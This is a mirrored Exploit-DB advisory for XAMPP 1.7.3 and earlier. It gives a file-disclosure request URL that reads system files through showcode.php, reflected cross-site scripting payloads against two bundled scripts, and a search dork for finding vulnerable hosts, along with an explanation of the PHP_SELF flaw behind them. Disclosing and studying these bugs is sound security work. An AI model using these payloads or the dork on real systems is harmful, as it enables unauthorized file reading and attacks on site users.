bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/15370.txt
Offensive Security 7ef2cb97bd DB: 2017-01-07 
1 new exploits

Google Android max86902 Driver - 'sysfs' Interfaces Race Condition

Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution

doop CMS 1.3.7 - (page) Local File Inclusion
doop CMS 1.3.7 - Local File Inclusion

Basic-CMS - 'acm2000.mdb' Remote Database Disclosure
Basic-CMS - Remote Database Disclosure

CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection
CMS NetCat 3.12 - 'password_recovery.php' Blind SQL Injection
StormBoard 1.0.1 - (thread.php id) SQL Injection
Joomla! Component com_lowcosthotels - 'id' Blind SQL Injection
Joomla! Component com_allhotels - 'id' Blind SQL Injection
StormBoard 1.0.1 - SQL Injection
Joomla! Component com_lowcosthotels - Blind SQL Injection
Joomla! Component com_allhotels - Blind SQL Injection

ILIAS 3.7.4 - (ref_id) Blind SQL Injection
ILIAS 3.7.4 - 'ref_id' Parameter Blind SQL Injection
Joomla! Component Live Ticker 1.0 - (tid) Blind SQL Injection
Joomla! Component mdigg 2.2.8 - (category) SQL Injection
Joomla! Component 5starhotels - 'id' SQL Injection
Joomla! Component Live Ticker 1.0 - Blind SQL Injection
Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection
Joomla! Component 5starhotels - SQL Injection

W2B phpEmployment - 'conf.inc' File Disclosure
phpEmployment - 'conf.inc' File Disclosure

phpGreetCards - 'conf.inc' Config File Disclosure
phpGreetCards - Config File Disclosure

Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion
Joomla! Component com_bca-rss-syndicator - Local File Inclusion

Joomla! Component 'com_appointment' 1.5 - Local File Inclusion
Joomla! Component Appointment 1.5 - Local File Inclusion

Joomla! Component 'com_awiki' - Local File Inclusion
Joomla! Component aWiki - Local File Inclusion

Joomla! Component 'com_articles' - SQL Injection
Joomla! Component com_articles - SQL Injection

Joomla! Component 'com_allvideos' - Blind SQL Injection
Joomla! Component allvideos - Blind SQL Injection

Joomla! Component 'Card View JX' - Cross-Site Scripting
Joomla! Component Card View JX - Cross-Site Scripting

Joomla! Component 'com_articleman' - Arbitrary File Upload
Joomla! Component Article Factory Manager - Arbitrary File Upload

Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion
Joomla! Component aardvertiser 2.0 - Local File Inclusion

Joomla! Component 'com_annonces' - Arbitrary File Upload
Joomla! Component com_annonces - Arbitrary File Upload

Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities
Joomla! Component Answers 2.3beta - Multiple Vulnerabilities

Joomla! Component 'com_beamospetition' - SQL Injection
Joomla! Component com_beamospetition - SQL Injection

Joomla! Component 'com_biblioteca' 1.0 Beta - Multiple SQL Injections
Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections

Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection
Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection

Joomla! Component 'com_alfurqan15x' - SQL Injection
Joomla! Component com_alfurqan15x - SQL Injection

Joomla! Component 'com_adsmanager' - Remote File Inclusion
Joomla! Component com_adsmanager - Remote File Inclusion

Joomla! Component 'com_acooldebate' 1.0.3 - Local File Inclusion
Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion

Joomla! Component 'com_a3000' - 'id' Parameter SQL Injection
Joomla! Component AutoArticles 3000 - SQL Injection

Joomla! Component 'com_annuaire' - 'id' Parameter SQL Injection
Joomla! Component Annuaire - Parameter SQL Injection

Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_bbs' - Multiple SQL Injections
Joomla! Component com_bbs - Multiple SQL Injections

Joomla! Component 'com_aclassfb' - Arbitrary File Upload
Joomla! Component Almond Classifieds - Arbitrary File Upload

Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting
Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting
2017-01-07 05:01:17 +00:00

70 lines
No EOL
2.5 KiB
Text
Executable file
Raw Blame History

# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
I. File disclosure
XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.
http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
showcode.php:
<?php
echo '<br><br>';
if ($_REQUEST['showcode'] != 1) {
echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
} else {
$file = file_get_contents(basename($_SERVER['PHP_SELF']));
echo "<h2>".$TEXT['global-sourcecode']."</h2>";
echo "<textarea cols='100' rows='10'>";
echo htmlspecialchars($file);
echo "</textarea>";
}
?>
showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
basename() parses the last element of that path using "/" as a delimiter.
Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.
II. Cross Site Scripting
http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
This can be exploited to perform Cross Site Scripting attacks.
biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
dork: "inurl:xampp/biorhythm.php"
Reference in a new issue View git blame Copy permalink